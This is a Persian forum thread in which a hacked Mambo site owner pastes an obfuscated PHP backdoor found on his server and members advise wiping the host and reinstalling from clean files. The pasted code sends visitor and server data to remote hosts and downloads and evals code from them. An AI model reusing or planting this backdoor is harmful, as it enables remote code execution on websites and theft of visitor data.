سلام
خسته نباشید
من چند وقت پیش روی یکی از سرورهای ایرانی بودم و زندگی خوبی داشتم و خوشبخت بودم که ناگهان در یک آن واحد هم سایت ارور داد هم انجمن که ما به سرور گفتیم و اونا گفتن غیر ممکنه و ....
حالا از اون سرور اومدم روی مامبو سرور
فقط این هکر هر جا رسیده یه فایل .htacces ساخته به اضافه یه فایل php که همیشه اسم فایلهاش 12658.php
یا یه سری اعداد هست
که من هرچی اینا رو پاک میکنم بازم هست
حالا یه سوال دارم
چیکار کنم و بگید که کجاها باید فایل htaccess باشه ؟
ممنون
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
سلام
شما چه كامپوننتهايي و چه ماژولهايي و مامبوتهايي در مامبو خودت نصب داري؟
قالب سايتت رو داري ؟
آيا تغييري در فايلهاي اصلي مامبو دادي؟
اين دوتا سوال رو جواب بده تا بگم دقيقاً چيكار كني.
كامروا باشيد.
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
میشه محتویات او دوتا فایل که فرمودید رو بزارید تا ببینیم؟!!
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
کامپوننت داتسو-ریموسیتوری - تبلیغات-مراجعات
بله دارم
شاید دادم یادم نیست.
کد یکی از این فایلها به قرار زیر هست :
این فایلهای htacces رو چیکار کنم که همه جا هست ؟کد:<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="d739bd1d01fff9d378253001215c277a") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bagdizzazbzhcczb".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bagdizzazbzhcczb".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
آقا اگه همه سورست رو یه جا منتقل کردی رو هاست جدید من اکیدا پیشنهاد میکنم که هاستت رو آب بکشی.یعنی کامل پاک کن و از اول سورس ها رو جایگزین کن.
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
سلام - بله كاملاً حق با ياشار عزيز هستش.
در فايلهاي php شما كارهايي انجام شده كه هكر بعداً ميتونه با استفاده از اونا به سرور شما متصل بشه و مشكلاتي رو براتون ايجاد كنه.
الان فايلهاي شما و شايد ديتابيس شما نيز آلوده باشن كه بهتره همه چيز رو نو بريزيد.
شما يكاري بكنيد و اينكارايي كه ميگم رو با دقت انجام بديد.
1 : از سايت فعلي خودتون بكاپ كامل بگيريد.
2 : فايلهاي موجود در هاست رو كاملاً پاك كنيد.
3 : از يك بسته آماده مامبو (هم ورژن مامبو فعلي) استفاده كنيد و تمامي فايلها را در هاست بريزيد.
4 : يك ديتابيس جديد ايجاد كنيد.
5 : مامبو رو نصب كنيد در ديتابيس جديد خودتون
6 : تمامي كامپوننتها و ماژولها و مامبوتها و قالب خودتون رو كه قبلاً در سايت نصب كرديد رو در مامبو جديد نيز نصب كنيد. (دقيقاً همون نسخه ها باشن كه در ديتابيس مشكلي پيش نياد)
7 : حالا كه مطمئنيد تمامي فايلهاي موجود سالم هستن بريد و به همان ديتابيس قبلي، مامبو رو متصل كنيد. (از طريق configuration.php)
البته ممكن هستش كه در ديتابيس شما هم نيز تغييراتي ايجاد كرده باشن كه بهتره اون رو هم بشينيد و كامل مشاهده كنيد كه مشكلي نداشته باشه.
در صورت اينكه ميتونيد اصلاً از اين سايت بگذريد ؛ و يا فقط از جداول اصلي ديتابيس قبلي خودتون استفاده كنيد و به سايت جديد منتقل كنيد.
اگر درك هريك از مسائل مطرح شده براتون سخته بفرماييد تا دقيقتر توضيح بدم. (دقيق بگو كه كجاش برات مشكله)
اگر هم نميتوني كه هيچي اگر خواستي من ميتونم برات رديف كنم ولي هيچ مسئوليتي بعدش نخواهم داشت. (فقط تا فردا من هستم اگر نميتوني بگو من همين امشب رديف كنم)
كامروا باشيد.
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
مجوز های ارسال و ویرایش
علاقه مندی ها (Bookmarks)